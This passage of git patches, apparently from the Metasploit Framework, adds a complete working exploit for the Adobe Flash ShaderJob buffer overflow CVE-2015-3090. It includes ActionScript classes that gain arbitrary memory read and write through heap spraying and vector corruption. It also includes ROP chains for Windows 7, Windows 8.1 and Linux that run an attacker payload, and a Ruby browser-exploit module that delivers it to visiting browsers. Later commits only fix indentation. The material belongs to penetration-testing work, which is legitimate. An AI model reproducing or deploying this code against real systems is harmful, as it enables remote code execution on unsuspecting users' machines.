+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3090/Exploiter.as b/external/source/exploits/CVE-2015-3090/Exploiter.as
new file mode 100644
index 0000000000..f32ba07e13
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3090/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3090/Logger.as b/external/source/exploits/CVE-2015-3090/Logger.as
new file mode 100644
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3090/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3090/PE.as b/external/source/exploits/CVE-2015-3090/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3090/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3090/exploit.pbj b/external/source/exploits/CVE-2015-3090/exploit.pbj
new file mode 100755
index 0000000000000000000000000000000000000000..762a6e6bfe820089d2f47cbe83039de544bff1c5
GIT binary patch
literal 420
zcmYL_O-{o=427Mv3l^2=9#!%ZBnaXJh?XrvV!;-<8PixKGtqcbs;)Rn`8x<lLR<hh
ztzb3tJwJ`#yw3~(KE^PWT0B#{W2L68c{B3Vu(nh(l%Xl+F@z^2?_#G#D=V(&>>Wqg
zjFxr@5vIKZuX+n?4wf8Mf``m3j<t-^rY+kBS+gQ}l!g|Jor+)Jd>;VgE`ezU&Vttz
zNxa#$<uYL;dj!wW$x<BS4W+7RXmyO@+b$K);!=g@7`pU_r~6sOvZ&JkaL*@}#9>RS
z=1T!n#i%9KY+AGql6~?u%K=6Yw_Tcr5S_8rmiI1r%Np_bRCjDm!WL<@!|U}H9Y0c6
qr=4{90`Lw)jU~M1!we3cCYa>#1u%v|e{SGn0N=UsB!iy;9KkOhcZd=I

literal 0
HcmV?d00001

diff --git a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
new file mode 100644
index 0000000000..b92a96839f
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => 'Adobe Flash Player ShaderJob Buffer Overflow',
+      'Description'         => %q{
+        This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
+        Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
+        same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
+        of the ShaderJob after starting the job it's possible to create a buffer overflow condition
+        where the size of the destination buffer and the length of the copy are controlled. This
+        module has been tested successfully on:
+        * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
+        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
+        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
+        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Chris Evans', # Vulnerability discovery
+          'Unknown', # Exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2015-3090'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
+          ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
+          ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
+            end
+
+            false
+          end
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'May 12 2015',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+end

From 55f077fa9e5542b3975ac39c1070895de2b14e78 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 18 Jun 2015 12:38:36 -0500
Subject: [PATCH 0446/1013] Fix indentation

---
 .../source/exploits/CVE-2015-3090/Exploit.as  | 40 +++++++++----------
 1 file changed, 20 insertions(+), 20 deletions(-)

diff --git a/external/source/exploits/CVE-2015-3090/Exploit.as b/external/source/exploits/CVE-2015-3090/Exploit.as
index 761a4164a4..9abb813042 100755
--- a/external/source/exploits/CVE-2015-3090/Exploit.as
+++ b/external/source/exploits/CVE-2015-3090/Exploit.as
@@ -1,29 +1,29 @@
 package
 {
-	import flash.display.BitmapData
-	import flash.display.Shader
-	import flash.display.ShaderJob
-	import flash.display.Sprite
-	import flash.utils.getTimer
+    import flash.display.BitmapData
+    import flash.display.Shader
+    import flash.display.ShaderJob
+    import flash.display.Sprite
+    import flash.utils.getTimer
     import flash.display.LoaderInfo
     import mx.utils.Base64Decoder
     import flash.utils.ByteArray
-    
+
 	public class Exploit extends Sprite
 	{
-		[Embed ( source="exploit.pbj", mimeType="application/octet-stream" ) ]
-		private static var BilinearScaling:Class
-		private var ov:Vector.<Object>
+        [Embed ( source="exploit.pbj", mimeType="application/octet-stream" ) ]
+        private static var BilinearScaling:Class
+        private var ov:Vector.<Object>
         private var uv:Vector.<uint>
-        
+
         private var b64:Base64Decoder = new Base64Decoder()
         private var payload:ByteArray
         private var platform:String
         private var os:String
         private var exploiter:Exploiter
 
-		public function Exploit()
-		{
+        public function Exploit()
+        {
             platform = LoaderInfo(this.root.loaderInfo).parameters.pl
             os = LoaderInfo(this.root.loaderInfo).parameters.os
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
@@ -42,26 +42,26 @@ package
 
             // Put vectors in memory
             ov = new Vector.<Object>(1024)
-            
+
             for (var i:uint = 0; i < ov.length; i++) {
                 ov[i] = new Vector.<uint>(0xa6)
                 ov[i][0] = 0xdeedbeef
                 ov[i][1] = i
                 ov[i][2] = 0xdeadbeaf
             }
-            
+
             // Create holes by redimensioning some vectors
             for (i = ov.length / 2; i < ov.length; i = i + 6) {
                 ov[i].length = 0x14c // 0xa6 * 2
             }
-			
+
             // Defragment memory so hopefully one of our holes will be used 
             // by the ShaderJob later...
             var defrag:Vector.<Object> = new Vector.<Object>(20)
             for(i = 0; i < defrag.length; i++) {
                 defrag[i] = new Vector.<uint>(0xa6)
             }
-			
+
             // Apply the bilinear scaling with a ShaderJob, so the job
             // can be execued on a new thread, providing us the opportunity
             // to tweak the width attribute after starting the job, providing
@@ -73,7 +73,7 @@ package
             shaderJob.start()
             shaderJob.width = 0xa5 // Overwrite "next" vector length
             this.WaitTimer(1000)
-			
+
             for (i = 0; i < ov.length; i++) {
                 if (ov[i].length != 0xa6 && ov[i].length != 0x14c) {
                     Logger.log("[*] Exploit - Exploit(): Vector corrupted: " + i.toString() + " : " + ov[i].length.toString())
@@ -83,14 +83,14 @@ package
                     ov[i] = null
                 }
             }
-            
+
             if (uv == null) {
                 Logger.log("[!] Exploit - Exploit(): Corrupted Vector not found")
                 return
             }
-            
+
             exploiter = new Exploiter(this, platform, os, payload, uv)
-		}
+        }
 				
         private function WaitTimer(time:int):void{
             var current:int = getTimer()

From 27a583853cec767573b4ffed02cc269d0af6200f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 18 Jun 2015 12:40:30 -0500
Subject: [PATCH 0447/1013] Fix one more line indentation

---
 external/source/exploits/CVE-2015-3090/Exploit.as | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/external/source/exploits/CVE-2015-3090/Exploit.as b/external/source/exploits/CVE-2015-3090/Exploit.as
index 9abb813042..3ed18ef38c 100755
--- a/external/source/exploits/CVE-2015-3090/Exploit.as
+++ b/external/source/exploits/CVE-2015-3090/Exploit.as
@@ -9,7 +9,7 @@ package
     import mx.utils.Base64Decoder
     import flash.utils.ByteArray
 
-	public class Exploit extends Sprite
+    public class Exploit extends Sprite
 	{
         [Embed ( source="exploit.pbj", mimeType="application/octet-stream" ) ]
         private static var BilinearScaling:Class

From 13a3f2781d42a19db5a3bcf99a6c049addad88ed Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 18 Jun 2015 13:07:44 -0500
Subject: [PATCH 0448/1013] Change ExcellentRanking to GoodRanking for MS14-064

The ms14_064_ole_code_execution exploit's ranking is being lowered
to GoodRanking because of these two reasons:

1. The vulnerable component isn't in Internet Explorer. And BES can't
   check it so the exploit still fires even if the target is patched.
2. Although rare, we've seen the exploit crashing IE, and since this
   is a memory curruption type of bug, it should not be in Excellent
   ranking anyway.
---
 modules/exploits/windows/browser/ms14_064_ole_code_execution.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

